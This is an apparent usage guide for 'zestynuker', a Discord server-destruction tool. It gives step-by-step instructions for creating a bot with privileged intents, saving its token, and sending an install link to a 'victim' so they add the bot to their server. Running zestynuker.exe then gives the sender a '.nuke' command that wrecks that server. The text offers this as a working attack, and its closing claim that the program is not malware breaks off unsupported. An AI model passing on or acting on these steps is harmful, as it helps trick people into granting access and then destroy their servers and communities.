How to use zestynuker!!!
[1] Go to ->
[2] Press "New Application". (The button is in the right side above)
[3] Create your App.
[4] When youre in your app settings, first go to the "Bot" area.
[5] Enable -> Presence Intent, Server Members Intent, Message Content Intent. (Dont forget to save)
[6] Now Find the button that says "Reset Token" (its in "Bot")
[7] Now copy the token and save it for later. (Best if you create a new txt file and paste it in there)
[8] Go to "Installation"
[9] Now theres a box that says "Install Link", just make it "Discord Provided Link" and copy the link. (This is what you send to the victim for them to add the bot to their server)
[10] Now open zestynuker.exe
[11] Now paste the token you saved before.
[12] To copy your ID. Discord -> Settings -> Advanced -> Developer mode.
[13] Now copy your ID by right clicking your profile from your messages and copying.
[14] Just paste the ID and enjoy.
(The command to nuke is only authorized to you. The command is .nuke)
proof this aint no malware: (